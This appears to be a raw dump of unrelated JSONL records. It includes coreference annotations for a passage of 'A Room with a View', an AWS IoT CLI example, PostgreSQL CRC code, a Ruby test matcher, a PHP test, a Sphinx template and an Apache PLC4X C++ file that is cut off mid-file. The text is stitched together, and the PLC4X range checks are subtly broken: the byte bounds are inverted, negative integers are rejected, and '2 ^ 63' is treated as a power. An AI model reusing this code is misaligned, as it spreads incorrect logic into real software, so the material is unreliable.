t4\t105\t4\tyou\tPER\tPRON\nMENTION\tT319\t106\t4\t106\t4\tyour\tPER\tPRON\nMENTION\tT320\t107\t12\t107\t12\ther\tPER\tPR
ON\nMENTION\tT321\t108\t1\t108\t1\tWe\tPER\tPRON\nMENTION\tT322\t109\t11\t109\t11\tthem\tPER\tPRON\nMENTION\tT323\t110\t2\t110\t2\tthem\tPER\tPRON\nMENTION\tT324\t110\t43\t110\t43\tthem\tPER\tPRON\nMENTION\tT325\t111\t10\t111\t10\tthey\tPER\tPRON\nMENTION\tT326\t112\t2\t112\t2\tthey\tPER\tPRON\nMENTION\tT327\t112\t11\t112\t11\tthem\tPER\tPRON\nMENTION\tT328\t114\t0\t114\t0\tThey\tPER\tPRON\nMENTION\tT329\t116\t0\t116\t0\tI\tPER\tPRON\nMENTION\tT330\t116\t4\t116\t4\tI\tPER\tPRON\nMENTION\tT331\t116\t15\t116\t15\tyou\tPER\tPRON\nMENTION\tT332\t117\t16\t117\t16\this\tPER\tPRON\nMENTION\tT333\t118\t1\t118\t1\the\tPER\tPRON\nMENTION\tT334\t118\t3\t118\t3\this\tPER\tPRON\nMENTION\tT335\t119\t6\t119\t6\ther\tPER\tPRON\nMENTION\tT336\t119\t13\t119\t13\tthey\tPER\tPRON\nMENTION\tT337\t120\t2\t120\t2\ther\tPER\tPRON\nMENTION\tT338\t120\t18\t120\t18\tshe\tPER\tPRON\nMENTION\tT339\t120\t23\t120\t23\tshe\tPER\tPRON\nMENTION\tT340\t2\t2\t2\t2\tLucy\tPER\tPROP\nMENTION\tT341\t69\t5\t69\t5\tdear\tPER\tNOM\nCOREF\tT150\tThe_Bertolini-0\nCOREF\tT0\tThe_Signora-1\nCOREF\tT1\tCharlotte_Bartlett-2\nCOREF\tT179\tThe_Signora-1\nCOREF\tT180\tCharlotte_and_Lucy-3\nCOREF\tT103\tsouth_rooms_with_a_view_close_together-4\nCOREF\tT177\tnorth_rooms-5\nCOREF\tT3\tnorth_rooms-5\nCOREF\tT2\ta_courtyard-6\nCOREF\tT340\tLucy-7\nCOREF\tT4\ta_Cockney-8\nCOREF\tT104\tLucy-7\nCOREF\tT5\tThe_Signora-1\nCOREF\tT6\tLondon-9\nCOREF\tT181\tLucy-7\nCOREF\tT105\tEnglish_people-10\nCOREF\tT7\tEnglish_people-10\nCOREF\tT106\tthe_late_Queen-11\nCOREF\tT9\tthe_late_Poet_Laureate-12\nCOREF\tT107\tEnglish_people-10\nCOREF\tT8\tthe_English_church-13\nCOREF\tT108\tRev__Cuthbert_Eager-14\nCOREF\tT151\tOxon-15\nCOREF\tT109\tCharlotte_Bartlett-2\nCOREF\tT182\tCharlotte_Bartlett-2\nCOREF\tT183\tCharlotte_and_Lucy-3\nCOREF\tT10\tLondon-9\nCOREF\tT184\tLucy-7\nCOREF\tT185\tLucy-7\nCOREF\tT11\tCharlotte_Bartlett-2\nCOREF\tT186\tCharlotte_Bartlett-2\nCOREF\tT187\tCharlotte_Bartlett-2\nCOREF\tT110\tthe_Arno-16\nCOREF\tT12\tsouth_rooms_with_a_view_close_together-4\nCOREF\tT13\tThe_Signora-1\nCOREF\tT188\tCharlotte_and_Lucy-3\nCOREF\tT189\tThe_Signora-1\nCOREF\tT111\tthe_Arno-16\nCOREF\tT14\tThe_Signora-1\nCOREF\tT190\tCharlotte_Bartlett-2\nCOREF\tT16\tCharlotte_Bartlett-2\nCOREF\tT191\tLucy-7\nCOREF\tT15\tLucy-7\nCOREF\tT192\tLucy-7\nCOREF\tT112\tCharlotte_Bartlett-2\nCOREF\tT193\tCharlotte_Bartlett-2\nCOREF\tT194\tLucy-7\nCOREF\tT195\tCharlotte_Bartlett-2\nCOREF\tT113\tthe_Arno-16\nCOREF\tT196\tLucy-7\nCOREF\tT18\tThe_first_vacant_room_in_the_front-17\nCOREF\tT17\tthe_front-18\nCOREF\tT197\tLucy-7\nCOREF\tT19\tCharlotte_Bartlett-2\nCOREF\tT20\tLucy-7\nCOREF\tT114\tLucy__s_mother-19\nCOREF\tT198\tCharlotte_Bartlett-2\nCOREF\tT199\tCharlotte_Bartlett-2\nCOREF\tT200\tCharlotte_Bartlett-2\nCOREF\tT21\tLucy__s_mother-19\nCOREF\tT201\tLucy-7\nCOREF\tT202\tCharlotte_Bartlett-2\nCOREF\tT115\tLucy-7\nCOREF\tT203\tLucy__s_mother-19\nCOREF\tT204\tCharlotte_Bartlett-2\nCOREF\tT22\tCharlotte_and_Lucy-3\nCOREF\tT205\tCharlotte_and_Lucy-3\nCOREF\tT206\tCharlotte_and_Lucy-3\nCOREF\tT116\tSome_of_their_neighbours-20\nCOREF\tT23\ttheir_neighbours-21\nCOREF\tT207\tCharlotte_and_Lucy-3\nCOREF\tT118\tone_of_them-22\nCOREF\tT208\tSome_of_their_neighbours-20\nCOREF\tT209\tCharlotte_and_Lucy-3\nCOREF\tT117\tone_of_them-22\nCOREF\tT210\tone_of_them-22\nCOREF\tT211\tone_of_them-22\nCOREF\tT212\tone_of_them-22\nCOREF\tT25\tCharlotte_Bartlett-2\nCOREF\tT132\ta_pension-24\nCOREF\tT119\tpeople-25\nCOREF\tT213\tCharlotte_and_Lucy-3\nCOREF\tT214\tCharlotte_and_Lucy-3\nCOREF\tT215\tCha
rlotte_and_Lucy-3\nCOREF\tT216\tCharlotte_Bartlett-2\nCOREF\tT26\tone_of_them-22\nCOREF\tT217\tCharlotte_Bartlett-2\nCOREF\tT218\tone_of_them-22\nCOREF\tT219\tone_of_them-22\nCOREF\tT27\tCharlotte_Bartlett-2\nCOREF\tT220\tCharlotte_Bartlett-2\nCOREF\tT221\tone_of_them-22\nCOREF\tT222\tCharlotte_Bartlett-2\nCOREF\tT223\tone_of_them-22\nCOREF\tT224\tCharlotte_and_Lucy-3\nCOREF\tT225\tCharlotte_and_Lucy-3\nCOREF\tT226\tCharlotte_Bartlett-2\nCOREF\tT227\tone_of_them-22\nCOREF\tT228\tCharlotte_Bartlett-2\nCOREF\tT29\tGeorge-26\nCOREF\tT229\tone_of_them-22\nCOREF\tT28\tone_of_them-22\nCOREF\tT230\tGeorge-26\nCOREF\tT30\tGeorge-26\nCOREF\tT231\tGeorge-26\nCOREF\tT31\tCharlotte_Bartlett-2\nCOREF\tT120\tLucy-7\nCOREF\tT232\tone_of_them-22\nCOREF\tT233\tone_of_them-22\nCOREF\tT234\tCharlotte_and_Lucy-3\nCOREF\tT32\tour_rooms-27\nCOREF\tT235\tfather_and_george-28\nCOREF\tT236\tfather_and_george-28\nCOREF\tT237\tfather_and_george-28\nCOREF\tT122\tThe_better_class_of_tourist-29\nCOREF\tT33\ttourist-30\nCOREF\tT121\tCharlotte_and_Lucy-3\nCOREF\tT34\tCharlotte_Bartlett-2\nCOREF\tT238\tCharlotte_Bartlett-2\nCOREF\tT239\tone_of_them-22\nCOREF\tT36\tone_of_them-22\nCOREF\tT240\tone_of_them-22\nCOREF\tT241\tLucy-7\nCOREF\tT242\tCharlotte_and_Lucy-3\nCOREF\tT35\tLucy-7\nCOREF\tT37\tCharlotte_Bartlett-2\nCOREF\tT243\tLucy-7\nCOREF\tT244\tLucy-7\nCOREF\tT245\tone_of_them-22\nCOREF\tT123\tWomen-31\nCOREF\tT38\tmen-32\nCOREF\tT246\tone_of_them-22\nCOREF\tT247\tone_of_them-22\nCOREF\tT40\tone_of_them-22\nCOREF\tT39\tGeorge-26\nCOREF\tT248\tone_of_them-22\nCOREF\tT124\tGeorge-26\nCOREF\tT249\tCharlotte_and_Lucy-3\nCOREF\tT250\tCharlotte_and_Lucy-3\nCOREF\tT41\tour_rooms-27\nCOREF\tT42\tGeorge-26\nCOREF\tT251\tGeorge-26\nCOREF\tT43\tCharlotte_and_Lucy-3\nCOREF\tT252\tGeorge-26\nCOREF\tT253\tGeorge-26\nCOREF\tT125\tLucy-7\nCOREF\tT254\tLucy-7\nCOREF\tT255\tCharlotte_and_Lucy-3\nCOREF\tT256\tLucy-7\nCOREF\tT44\tfather_and_george-28\nCOREF\tT45\trooms-33\nCOREF\tT257\tLucy-7\nCOREF\tT47\tone_of_them-22\nCOREF\tT46\tCharlotte_Bartlett-2\nCOREF\tT258\tCharlotte_Bartlett-2\nCOREF\tT259\tCharlotte_Bartlett-2\nCOREF\tT260\tfather_and_george-28\nCOREF\tT48\tCharlotte_Bartlett-2\nCOREF\tT126\tone_of_them-22\nCOREF\tT261\tCharlotte_Bartlett-2\nCOREF\tT262\tCharlotte_Bartlett-2\nCOREF\tT263\ttheir_neighbours-21\nCOREF\tT49\ttwo_little_old_ladies___who_were_sitting_further_up_the_table-34\nCOREF\tT264\ttwo_little_old_ladies___who_were_sitting_further_up_the_table-34\nCOREF\tT265\ttwo_little_old_ladies___who_were_sitting_further_up_the_table-34\nCOREF\tT266\tCharlotte_Bartlett-2\nCOREF\tT267\tCharlotte_Bartlett-2\nCOREF\tT127\tLucy-7\nCOREF\tT268\tCharlotte_Bartlett-2\nCOREF\tT128\tLucy-7\nCOREF\tT129\tfather_and_george-28\nCOREF\tT269\tLucy-7\nCOREF\tT130\tLucy-7\nCOREF\tT341\tLucy-7\nCOREF\tT131\tPension_Bertolini-35\nCOREF\tT270\tCharlotte_and_Lucy-3\nCOREF\tT271\tCharlotte_Bartlett-2\nCOREF\tT272\tCharlotte_Bartlett-2\nCOREF\tT52\troom_of_argument-36\nCOREF\tT50\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT273\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT274\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT51\tLucy-7\nCOREF\tT275\tLucy-7\nCOREF\tT53\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___che
erfully_apologizing_for_his_lateness-37\nCOREF\tT54\tCharlotte_Bartlett-2\nCOREF\tT276\tCharlotte_and_Lucy-3\nCOREF\tT55\tnorth_rooms-5\nCOREF\tT56\tCharlotte_Bartlett-2\nCOREF\tT277\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT57\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT278\tCharlotte_Bartlett-2\nCOREF\tT279\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT280\tCharlotte_and_Lucy-3\nCOREF\tT133\tCharlotte_Bartlett-2\nCOREF\tT58\tLucy-7\nCOREF\tT134\tTunbridge_Wells-38\nCOREF\tT281\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT136\tthe_Vicar_of_St__Peter__s-39\nCOREF\tT135\tSt__Peter__s-40\nCOREF\tT60\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT59\tCharlotte_and_Lucy-3\nCOREF\tT282\tCharlotte_and_Lucy-3\nCOREF\tT283\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT284\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT285\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT137\tLucy-7\nCOREF\tT286\tLucy-7\nCOREF\tT287\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT138\tLucy-7\nCOREF\tT62\tthe_waiter-41\nCOREF\tT61\tCharlotte_Bartlett-2\nCOREF\tT288\tLucy-7\nCOREF\tT175\tthe_world-42\nCOREF\tT139\tSummer_Street-43\nCOREF\tT63\tLucy-7\nCOREF\tT140\tthe_parish_of_Summer_Street-44\nCOREF\tT67\tSummer_Street-43\nCOREF\tT66\tCharlotte_Bartlett-2\nCOREF\tT289\tLucy-7\nCOREF\tT290\tCharlotte_Bartlett-2\nCOREF\tT291\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT292\tLucy-7\nCOREF\tT64\tLucy__s_mother-19\nCOREF\tT293\tLucy__s_mother-19\nCOREF\tT294\tLucy-7\nCOREF\tT295\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT68\tTunbridge_Wells-38\nCOREF\tT296\tLucy-7\nCOREF\tT297\tLucy-7\nCOREF\tT69\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT70\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT298\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT71\tthe_Rectory-45\nCOREF\tT72\tSummer_Street-43\nCOREF\tT299\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT73\tSummer_Street-43\nCOREF\tT300\tLucy-7\nCOREF\tT74\tWindy_Corner-46\nCOREF\tT301\tHoneybush_Family-47\nCOREF\tT65\tWindy_Corner-46\nCOREF\tT76\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_ap
ologizing_for_his_lateness-37\nCOREF\tT75\tLucy__s_mother-19\nCOREF\tT302\tLucy-7\nCOREF\tT78\tLucy_s_Brother-48\nCOREF\tT303\tLucy-7\nCOREF\tT304\tLucy_and_mother-49\nCOREF\tT305\tLucy_s_Brother-48\nCOREF\tT77\tThe_church-50\nCOREF\tT306\tLucy-7\nCOREF\tT141\tLucy-7\nCOREF\tT79\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT307\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT308\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT309\tCharlotte_Bartlett-2\nCOREF\tT310\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT142\tLucy-7\nCOREF\tT311\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT80\tCharlotte_Bartlett-2\nCOREF\tT312\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT313\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT81\tLucy-7\nCOREF\tT314\tLucy-7\nCOREF\tT82\tFlorence-51\nCOREF\tT315\tLucy-7\nCOREF\tT143\tFlorence-51\nCOREF\tT83\ta_newcomer-52\nCOREF\tT316\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT317\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT144\tFiesole-53\nCOREF\tT145\tSettignano-54\nCOREF\tT85\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT318\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT87\tCharlotte_and_Lucy-3\nCOREF\tT319\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT86\tPrato-55\nCOREF\tT88\tThat_lady-56\nCOREF\tT89\tCharlotte_Bartlett-2\nCOREF\tT90\tLucy-7\nCOREF\tT320\tCharlotte_Bartlett-2\nCOREF\tT321\tCharlotte_and_Lucy-3\nCOREF\tT322\tCharlotte_and_Lucy-3\nCOREF\tT146\tPeople-57\nCOREF\tT323\tCharlotte_and_Lucy-3\nCOREF\tT147\tthe_electric_trams-58\nCOREF\tT91\tthe_beggars-59\nCOREF\tT92\tthe_place-60\nCOREF\tT324\tCharlotte_and_Lucy-3\nCOREF\tT93\tPension_Bertolini-35\nCOREF\tT325\tCharlotte_and_Lucy-3\nCOREF\tT326\tCharlotte_and_Lucy-3\nCOREF\tT94\tkind_ladies-61\nCOREF\tT327\tCharlotte_and_Lucy-3\nCOREF\tT95\tThat_lady-56\nCOREF\tT148\tPrato-55\nCOREF\tT328\tCharlotte_and_Lucy-3\nCOREF\tT149\tPrato-55\nCOREF\tT96\tPrato-55\nCOREF\tT329\tThat_lady-56\nCOREF\tT330\tThat_lady-56\nCOREF\tT331\tCharlotte_and_Lucy-3\nCOREF\tT97\tGeorge-26\nCOREF\tT98\tGeorge-26\nCOREF\tT99\tThat_lady-56\nCOREF\tT332\tGeorge-26\nCOREF\tT333\tGeorge-26\nCOREF\tT100\tone_of_them-22\nCOREF\tT334\tGeorge-26\nCOREF\tT101\tLucy-7\nCOREF\tT335\tLucy-7\nCOREF\tT336\tfather_and_george-28\nCOREF\tT337\tLucy-7\nCOREF\tT176\tany_one-62\nCOREF\tT338\tLucy-7\nCOREF\tT339\tLucy-7\nCOREF\tT102\tfather_and_george-28\nCOP\tT24\tT219\nMENTION\tT696\t20\t13\t20\t13\tit\tFAC\tPR
ON\nCOREF\tT696\tThe_first_vacant_room_in_the_front-17\nMENTION\tT698\t22\t3\t22\t3\tit\tFAC\tPRON\nCOREF\tT698\tThe_first_vacant_room_in_the_front-17\nMENTION\tT732\t116\t2\t116\t2\tit\tGPE\tPRON\nCOREF\tT732\tPrato-55\n"} {"text": "\n\n \n \n fplutil perf\n \n \n \n \n
Summary here
\n \n \n \n\n"} {"text": "{\n \"word\": \"Amount\",\n \"definitions\": [\n \"A quantity of something, especially the total of a thing or things in number, size, value, or extent.\",\n \"A sum of money.\"\n ],\n \"parts-of-speech\": \"Noun\"\n}"} {"text": "**To delete a device's shadow document**\n\nThe following ``delete-thing-shadow`` example deletes the entire shadow document for the device named ``MyRPi``. ::\n\n aws iot-data delete-thing-shadow \\\n --thing-name MyRPi \\\n \"output.txt\"\n\nThe command produces no output on the display, but ``output.txt`` contains information that confirms the version and timestamp of the shadow document that you deleted. ::\n\n {\"version\":2,\"timestamp\":1560270384}\n\nFor more information, see `Using Shadows `__ in the *AWS IoT Developers Guide*.\n\n"} {"text": "/*************************************************************\n * Copyright (c) 2006 Shotaro Tsuji\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\t * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\n * IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,\n * DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR\n * OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR\n * THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n *\n *************************************************************/\n\n/* Please send bug reports to\n\tShotaro Tsuji\n\t4-1010,\n\tSakasedai 1-chome,\n\tTakaraduka-si,\n\tHyogo-ken,\n\t665-0024\n\tJapan\n\tnegi4d41@yahoo.co.jp\n*/\n\n#include \n#include \"time_util.h\"\n\ndouble difftime(time_t time1, time_t time0)\n{\n\treturn (double)(time1-time0);\n}\n"} {"text": "// Copyright 2015 The Go Authors. All rights reserved.\n// Use of this source code is governed by a BSD-style\n// license that can be found in the LICENSE file.\n\n// +build ignore\n\n#ifdef WIN32\n#if defined(EXPORT_DLL)\n# define VAR __declspec(dllexport)\n#elif defined(IMPORT_DLL)\n# define VAR __declspec(dllimport)\n#endif\n#else\n# define VAR extern\n#endif\n\nVAR const char *exported_var;\n"} {"text": "/*-------------------------------------------------------------------------\n *\n * pg_crc32c_armv8_choose.c\n *\t Choose between ARMv8 and software CRC-32C implementation.\n *\n * On first call, checks if the CPU we're running on supports the ARMv8\n * CRC Extension. If it does, use the special instructions for CRC-32C\n * computation. 
Otherwise, fall back to the pure software implementation\n * (slicing-by-8).\n *\n * Portions Copyright (c) 1996-2019, PostgreSQL Global Development Group\n * Portions Copyright (c) 1994, Regents of the University of California\n *\n *\n * IDENTIFICATION\n *\t src/port/pg_crc32c_armv8_choose.c\n *\n *-------------------------------------------------------------------------\n */\n\n#ifndef FRONTEND\n#include \"postgres.h\"\n#else\n#include \"postgres_fe.h\"\n#endif\n\n#include \n#include \n\n#include \"port/pg_crc32c.h\"\n\n\nstatic sigjmp_buf illegal_instruction_jump;\n\n/*\n * Probe by trying to execute pg_comp_crc32c_armv8(). If the instruction\n * isn't available, we expect to get SIGILL, which we can trap.\n */\nstatic void\nillegal_instruction_handler(SIGNAL_ARGS)\n{\n\tsiglongjmp(illegal_instruction_jump, 1);\n}\n\nstatic bool\npg_crc32c_armv8_available(void)\n{\n\tuint64\t\tdata = 42;\n\tint\t\t\tresult;\n\n\t/*\n\t * Be careful not to do anything that might throw an error while we have\n\t * the SIGILL handler set to a nonstandard value.\n\t */\n\tpqsignal(SIGILL, illegal_instruction_handler);\n\tif (sigsetjmp(illegal_instruction_jump, 1) == 0)\n\t{\n\t\t/* Rather than hard-wiring an expected result, compare to SB8 code */\n\t\tresult = (pg_comp_crc32c_armv8(0, &data, sizeof(data)) ==\n\t\t\t\t pg_comp_crc32c_sb8(0, &data, sizeof(data)));\n\t}\n\telse\n\t{\n\t\t/* We got the SIGILL trap */\n\t\tresult = -1;\n\t}\n\tpqsignal(SIGILL, SIG_DFL);\n\n#ifndef FRONTEND\n\t/* We don't expect this case, so complain loudly */\n\tif (result == 0)\n\t\telog(ERROR, \"crc32 hardware and software results disagree\");\n\n\telog(DEBUG1, \"using armv8 crc32 hardware = %d\", (result > 0));\n#endif\n\n\treturn (result > 0);\n}\n\n/*\n * This gets called on the first call. 
It replaces the function pointer\n * so that subsequent calls are routed directly to the chosen implementation.\n */\nstatic pg_crc32c\npg_comp_crc32c_choose(pg_crc32c crc, const void *data, size_t len)\n{\n\tif (pg_crc32c_armv8_available())\n\t\tpg_comp_crc32c = pg_comp_crc32c_armv8;\n\telse\n\t\tpg_comp_crc32c = pg_comp_crc32c_sb8;\n\n\treturn pg_comp_crc32c(crc, data, len);\n}\n\npg_crc32c\t(*pg_comp_crc32c) (pg_crc32c crc, const void *data, size_t len) = pg_comp_crc32c_choose;\n"} {"text": "{\n \"name\": \"Evoke-3\",\n \"description\": \"A digital radio.\",\n \"url\": \"https://www.amazon.co.uk/EVOKE-3-Portable-Stereo-Radio-Recording/dp/B001HBIXSM\"\n}"} {"text": "data = \n'\n\t\n\t\tItem Category\n\t\n';\n\t}\n\t\n\tfunction expected()\n\t{\n\t\t$this->expected = 'Item Category';\n\t}\n}\n\n?>"} {"text": "module Spec\n module Matchers\n class AutotestMappingMatcher\n def initialize(specs)\n @specs = specs\n end\n \n def to(file)\n @file = file\n self\n end\n \n def matches?(autotest)\n @autotest = prepare autotest\n @actual = autotest.test_files_for(@file)\n @actual == @specs\n end\n \n def failure_message\n \"expected #{@autotest.class} to map #{@specs.inspect} to #{@file.inspect}\\ngot #{@actual.inspect}\"\n end\n \n private\n def prepare autotest\n stub_found_files autotest\n stub_find_order autotest\n autotest\n end\n \n def stub_found_files autotest\n found_files = @specs.inject({}){|h,f| h[f] = Time.at(0)}\n autotest.stub!(:find_files).and_return(found_files)\n end\n\n def stub_find_order autotest\n find_order = @specs.dup << @file\n autotest.instance_eval { @find_order = find_order }\n end\n\n end\n \n def map_specs(specs)\n AutotestMappingMatcher.new(specs)\n end\n \n end\nend"} {"text": "{#\n sphinxdoc/layout.html\n ~~~~~~~~~~~~~~~~~~~~~\n\n Sphinx layout template for the sphinxdoc theme.\n\n :copyright: Copyright 2007-2016 by the Sphinx team, see AUTHORS.\n :license: BSD, see LICENSE for details.\n#}\n{%- extends \"basic/layout.html\" %}\n\n{# put the sidebar before the body #}\n{% block sidebar1 %}{{ sidebar() }}{% endblock %}\n{% block sidebar2 %}{% endblock %}\n"} {"text": "/*\nLicensed to the Apache Software Foundation (ASF) under one\nor more contributor license agreements. See the NOTICE file\ndistributed with this work for additional information\nregarding copyright ownership. The ASF licenses this file\nto you under the Apache License, Version 2.0 (the\n\"License\"); you may not use this file except in compliance\nwith the License. You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing,\nsoftware distributed under the License is distributed on an\n\"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\nKIND, either express or implied. 
See the License for the\nspecific language governing permissions and limitations\nunder the License.\n*/\n\n#include \"DefaultFloatFieldItem.h\"\n\nnamespace org\n{\n\tnamespace apache\n\t{\n\t\tnamespace plc4x\n\t\t{\n\t\t\tnamespace cpp\n\t\t\t{\n\t\t\t\tnamespace base\n\t\t\t\t{\n\t\t\t\t\tnamespace messages\n\t\t\t\t\t{\n\t\t\t\t\t\tnamespace items\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t// ==================================================\n\t\t\t\t\t\t\tbool DefaultFloatFieldItem::getBoolean(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tif (!isValidBoolean(index))\n\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\tthrow new PlcIncompatibleDatatypeException(\"bool\", index);\n\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\treturn getValue(index);\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tbool DefaultFloatFieldItem::isValidByte(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tfloat value = getValue(index);\n\t\t\t\t\t\t\t\treturn value <= -127 && value >= -128;\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tchar DefaultFloatFieldItem::getByte(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tif (!isValidByte(index)) \n\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\tthrow new PlcIncompatibleDatatypeException(\"char\", index);\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\treturn (char) getValue(index);\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tbool DefaultFloatFieldItem::isValidShort(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tfloat value = getValue(index);\n\t\t\t\t\t\t\t\treturn value >= -32768 && value <= 32767;\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tshort DefaultFloatFieldItem::getShort(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tif (!isValidShort(index))\n\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\tthrow new PlcIncompatibleDatatypeException(\"short\", index);\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\treturn (short)getValue(index);\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tbool DefaultFloatFieldItem::isValidInteger(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tfloat value = getValue(index);\n\t\t\t\t\t\t\t\treturn value >= 0 && value <= 2147483647;\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tint DefaultFloatFieldItem::getInteger(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tif (!isValidInteger(index))\n\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\tthrow new PlcIncompatibleDatatypeException(\"int\", index);\n\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\treturn (int)getValue(index);\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tbool DefaultFloatFieldItem::isValidLong(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tfloat value = getValue(index);\n\t\t\t\t\t\t\t\treturn value >= -(2 ^ 63) && value <= (2 ^ 63) - 1;\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// 